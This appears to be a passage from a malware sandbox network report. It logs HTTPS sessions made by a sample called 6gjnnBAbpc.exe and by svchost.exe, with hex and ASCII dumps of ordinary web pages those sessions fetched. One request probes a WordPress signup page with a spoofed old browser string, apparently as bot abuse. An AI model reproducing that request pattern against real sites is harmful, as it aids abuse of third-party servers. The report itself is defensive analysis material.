2023-03-22 04:45:37 UTC	1171	IN	HTTP/1.1 200 OK Date: Wed, 22 Mar 2023 04:45:37 GMT Server: Apache/2.4.38 (Debian) Last-Modified: Thu, 02 Mar 2023 15:05:19 GMT Accept-Ranges: bytes Content-Length: 51841 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8
2023-03-22 04:45:37 UTC	1172	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 6c 61 6e 67 3d 22 64 65 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 21 2d 2d 20 0a 09 6d 61 64 65 20 62 79 20 50 53 56 6e 65 6f 0a 0a 09 54 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 54 59 50 4f 33 20 2d 20 69 6e 73 70 69 72 69 6e 67 20 70 65 6f 70 6c 65 20 74 6f 20 73 68 61 72 65 21 0a 09 54 59 50 4f 33 20 69 73 20 61 20 66 72 65 65 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 43 6f 6e 74 65 6e 74 20 4d 61 6e 61 67 65 6d 65 6e 74 20 46 72 61 6d 65 77 6f 72 6b 20 69 6e 69 74 69 61 6c 6c 79 20 63 72 65 61 74 65 64 20 62 79 20 4b 61 73 70 65 72 20 53 6b 61 61 72 68 6f 6a 20 Data Ascii: <!DOCTYPE html><html dir="ltr" lang="de"><head><meta charset="utf-8">... made by PSVneoThis website is powered by TYPO3 - inspiring people to share!TYPO3 is a free open source Content Management Framework initially created by Kasper Skaarhoj
2023-03-22 04:45:37 UTC	1188	IN	Data Raw: 20 20 20 20 20 20 20 56 65 72 73 63 68 6c 69 65 c3 9f 6d 61 73 63 68 69 6e 65 6e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 6c 61 79 6f 75 74 2d 30 20 20 22 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 76 65 72 73 63 68 6c 69 65 Data Ascii: Verschliemaschinen </a> </li> <li class="nav-item layout-0 "> <a href="/verschlie
2023-03-22 04:45:37 UTC	1204	IN	Data Raw: 66 72 61 6d 65 2d 6c 61 79 6f 75 74 2d 30 20 20 20 6d 74 2d 30 20 6d 62 2d 30 0a 20 20 20 20 0a 0a 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 6c 2d 33 20 63 6f 6c 2d 6c 67 2d 36 20 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 73 6d 2d 31 32 20 63 6f 6c 2d 31 32 20 6d 79 2d 34 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 65 72 76 69 63 65 62 6f 78 20 68 2d 31 30 30 20 62 67 2d 6c 69 67 68 74 2d 67 72 65 79 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 63 6f 6c 75 6d 6e 20 68 2d 31 30 30 20 77 2d 31 30 30 20 70 2d 33 20 22 3e 0a Data Ascii: frame-layout-0 mt-0 mb-0 "> <div class="row"> <div class="col-xl-3 col-lg-6 col-md-6 col-sm-12 col-12 my-4"> <div class="servicebox h-100 bg-light-grey d-flex flex-column h-100 w-100 p-3 ">
2023-03-22 04:45:37 UTC	1220	IN	Data Raw: 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 63 65 6e 74 65 72 20 6d 79 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 78 2d 30 20 6d 78 2d 6d 64 2d 35 20 6d 79 2d 32 20 6d 79 2d 6d 64 2d 30 22 20 69 74 65 6d 70 72 6f 70 3d 22 69 74 65 6d 4c 69 73 74 45 6c 65 6d 65 6e 74 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 69 73 74 49 74 65 6d 22 20 61 72 69 61 2d 63 75 72 72 65 6e 74 3d 22 70 61 67 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 Data Ascii: justify-content-center my-3"> <li class="mx-0 mx-md-5 my-2 my-md-0" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem" aria-current="page"> <a hr

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
72	192.168.2.5	25909	83.223.113.46	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:37 UTC	1222	OUT	GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: dataform.co.uk
2023-03-22 04:45:38 UTC	1224	IN	HTTP/1.1 200 OK Cache-Control: must-revalidate, no-cache, max-age=0 Keep-Alive: timeout=2, max=91 Content-Length: 48938 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Vary: Accept-Encoding Server: Apache Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with Access-Control-Allow-Origin: * X-Powered-By: PHP/7.0.29 X-UA-Compatible: IE=EmulateIE10 X-Frame-Options: SAMEORIGIN X-Mod-Pagespeed: 1.9.32.14-0 Strict-Transport-Security: max-age=10886400 X-Powered-By: ASP.NET Date: Wed, 22 Mar 2023 04:45:37 GMT Connection: close
2023-03-22 04:45:38 UTC	1224	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c Data Ascii: <!DOCTYPE html>...[if !(IE 6) \| !(IE 7) \| !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
2023-03-22 04:45:38 UTC	1227	IN	Data Raw: 7d 72 65 74 75 72 6e 21 31 7d 28 6f 5b 72 5d 29 2c 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 74 2e 73 75 70 70 6f 72 74 73 5b 6f 5b 72 5d 5d 2c 22 66 6c 61 67 22 21 3d 3d 6f 5b 72 5d 26 26 28 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 74 2e 73 75 70 70 6f 72 74 73 5b 6f 5b 72 5d 5d 29 3b 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 21 74 2e 73 75 70 70 6f 72 74 73 2e Data Ascii: }return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.
2023-03-22 04:45:38 UTC	1235	IN	Data Raw: 34 20 30 2e 38 3b 30 2e 32 20 30 2e 36 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 38 20 30 2e 34 20 30 2e 38 27 20 63 61 6c 63 4d 6f 64 65 3d 27 73 70 6c 69 6e 65 27 20 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 38 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 20 64 75 72 Data Ascii: 4 0.8;0.2 0.6 0.4 0.8;0.2 0.8 0.4 0.8' calcMode='spline' /%3E %3C/path%3E %3Cpath transform='translate(8)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12 V20 H4 V12z' dur
2023-03-22 04:45:38 UTC	1243	IN	Data Raw: 68 22 3a 22 54 79 70 65 20 74 6f 20 73 65 61 72 63 68 22 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 6b 62 2d 73 75 70 70 6f 72 74 2f 61 73 73 65 74 73 2f 6a 73 2f 6b 62 73 2d 61 6a 61 78 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 31 2e 35 2e 34 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 Data Ascii: h":"Type to search"};//...</script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/kb-support/assets/js/kbs-ajax.min.js?ver=1.5.4'></script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/revs
2023-03-22 04:45:38 UTC	1251	IN	Data Raw: 72 65 6d 6f 76 65 4c 6f 61 64 69 6e 67 3d 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 6f 61 64 2e 63 6c 61 73 73 4e 61 6d 65 2b 3d 22 20 6c 6f 61 64 65 72 2d 72 65 6d 6f 76 65 64 22 3b 7d 2c 35 30 30 29 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 20 74 79 70 65 3d 22 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f Data Ascii: removeLoading=setTimeout(function(){load.className+=" loader-removed";},500);});</script><link rel="icon" href="https://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg" type="" sizes="16x16"/><link rel="icon" href="https://dataform.co.uk/wp-co
2023-03-22 04:45:38 UTC	1259	IN	Data Raw: 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 48 6f 6d 65 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 32 35 32 35 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 64 61 74 61 66 6f 72 6d 2d 6f 76 65 72 76 69 65 77 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c Data Ascii: ass="menu-item-text"><span class="menu-text">Home</span></span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-52525"><a href='https://dataform.co.uk/dataform-overview/' data-level='1'><span class="menu-item-text"><
2023-03-22 04:45:38 UTC	1267	IN	Data Raw: 63 65 28 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6e 6f 2d 6a 73 2f 2c 27 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 27 29 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 61 73 73 4e 61 6d 65 3d 63 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 64 74 2d 74 68 65 37 2f 6a 73 2f 6d 61 69 6e 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 36 2e 30 2e 31 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 77 70 63 66 37 3d 7b Data Ascii: ce(/woocommerce-no-js/,'woocommerce-js');document.body.className=c;</script><script type='text/javascript' src='https://dataform.co.uk/wp-content/themes/dt-the7/js/main.min.js?ver=6.6.0.1'></script><script type='text/javascript'>//<![CDATA[var wpcf7={

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
73	192.168.2.5	24562	188.114.97.3	443	C:\Users\user\Desktop\6gjnnBAbpc.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:38 UTC	1223	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: hyab.se
2023-03-22 04:45:38 UTC	1223	IN	HTTP/1.1 302 Found Date: Wed, 22 Mar 2023 04:45:38 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Location: https://hyab.com Cache-Control: max-age=600 Expires: Wed, 22 Mar 2023 04:55:38 GMT CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zBUN1MOqPztrTejAETx1tUpw2Hj2rZVTRTgJ0sytH1P2%2Bix8jf%2B5c1LzhHtg%2BspDoI7WgDQgvBziF9vZMSxToV4fIPZRZWqb1eDgrRDoaXZz2k2zYjG7MvKl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7abbc94a7d1b6993-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2023-03-22 04:45:38 UTC	1223	IN	Data Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
2023-03-22 04:45:38 UTC	1224	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
74	192.168.2.5	26500	104.21.65.224	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:38 UTC	1224	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: hyab.com
2023-03-22 04:45:38 UTC	1272	IN	HTTP/1.1 302 Found Date: Wed, 22 Mar 2023 04:45:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding,User-Agent Set-Cookie: PHPSESSID=9c62c42c282c8208d6bf2d975c91fad4; path=/ Location: https://hyabmagneter.se CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BsnthAaKxyFf9aenvJOjM49n5vnm%2F503nlBpYka0sN3RC7LECPGvAjWSsdJTIEthpt7I3Uc9kDFoioCx80Lgz8ZoPrdm6Oe1T4euwEGkd9aoummDcHqGP6eZPw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7abbc94c597c365c-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2023-03-22 04:45:38 UTC	1273	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
75	192.168.2.5	26920	35.214.171.193	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:39 UTC	1273	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: flamingorecordings.com
2023-03-22 04:45:39 UTC	1273	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 22 Mar 2023 04:45:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding SG-F-Cache: HIT X-Httpd-Modphp: 1 Host-Header: 8441280b0c35cbc1147f8ba998a563a7 X-Proxy-Cache: HIT
2023-03-22 04:45:39 UTC	1273	IN	Data Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 27 20 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 49 45 3d 65 64 67 65 27 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 3c 74 69 74 6c Data Ascii: 8000<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name='viewport' content='width=device-width, initial-scale=1.0' /><meta http-equiv='X-UA-Compatible' content='IE=edge' /><link rel="profile" href="https://gmpg.org/xfn/11" /><titl
2023-03-22 04:45:39 UTC	1289	IN	Data Raw: 5f 31 32 30 30 70 78 2d 33 30 30 78 33 30 30 2e 70 6e 67 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 54 69 6c 65 49 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 37 2f 31 31 2f 46 6c 61 6d 69 6e 67 6f 5f 4c 6f 67 6f 5f 53 74 69 63 6b 65 72 5f 42 69 72 64 5f 31 32 30 30 70 78 2d 33 30 30 78 33 30 30 2e 70 6e 67 22 20 2f 3e 20 3c 73 74 79 6c 65 20 69 64 3d 22 77 70 2d 63 75 73 74 6f 6d 2d 63 73 73 22 3e 20 2e 66 6c 2d 70 6f 73 74 2d 67 72 69 64 2d 70 6f 73 74 7b 0a 20 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 0a 7d 0a 2e 72 65 6c 65 61 73 65 7b 0a 20 70 6f 73 69 Data Ascii: _1200px-300x300.png" /><meta name="msapplication-TileImage" content="https://flamingorecordings.com/wp-content/uploads/2017/11/Flamingo_Logo_Sticker_Bird_1200px-300x300.png" /> <style id="wp-custom-css"> .fl-post-grid-post{ border:none;}.release{ posi
2023-03-22 04:45:39 UTC	1305	IN	Data Raw: 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 50 65 72 73 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 61 75 74 68 6f 72 2f 61 64 6d 69 6e 2f 22 20 2f 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 64 6d 69 6e 22 20 2f 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 74 65 6d 70 72 6f 70 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 53 74 61 74 69 73 74 69 63 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 49 6e 74 65 72 61 63 74 69 6f 6e 43 6f 75 6e 74 65 72 22 3e 3c 6d Data Ascii: type="https://schema.org/Person"><meta itemprop="url" content="https://flamingorecordings.com/author/admin/" /><meta itemprop="name" content="admin" /></div><div itemprop="interactionStatistic" itemscope itemtype="https://schema.org/InteractionCounter"><m
2023-03-22 04:45:39 UTC	1321	IN	Data Raw: 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 46 6c 61 6d 69 6e 67 6f 20 52 65 63 6f 72 64 69 6e 67 73 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 70 72 6f 70 3d 22 61 75 74 68 6f 72 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 50 65 72 73 6f 6e 22 3e 3c 6d 65 74 61 20 69 74 65 6d 70 72 6f 70 3d 22 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2e 63 6f 6d 2f 61 75 74 68 6f 72 2f 61 64 6d 69 6e 2f 22 20 2f 3e 3c 6d 65 74 61 20 69 Data Ascii: temtype="https://schema.org/Organization"><meta itemprop="name" content="Flamingo Recordings"></div><div itemscope itemprop="author" itemtype="https://schema.org/Person"><meta itemprop="url" content="https://flamingorecordings.com/author/admin/" /><meta i
2023-03-22 04:45:39 UTC	1337	IN	Data Raw: 6e 62 6b 4f 58 5f 68 6c 7a 6e 72 64 42 57 48 52 77 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 20 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 62 20 66 61 2d 79 6f 75 74 75 62 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 20 3c 2f 61 3e 20 3c 2f 73 70 61 6e 3e 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6c 2d 69 63 6f 6e 22 3e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 6e 73 74 61 67 72 61 6d 2e 63 6f 6d 2f 66 6c 61 6d 69 6e 67 6f 72 65 63 6f 72 64 69 6e 67 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 20 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 62 20 66 61 2d 69 6e 73 74 61 67 72 61 6d 22 20 Data Ascii: nbkOX_hlznrdBWHRw" 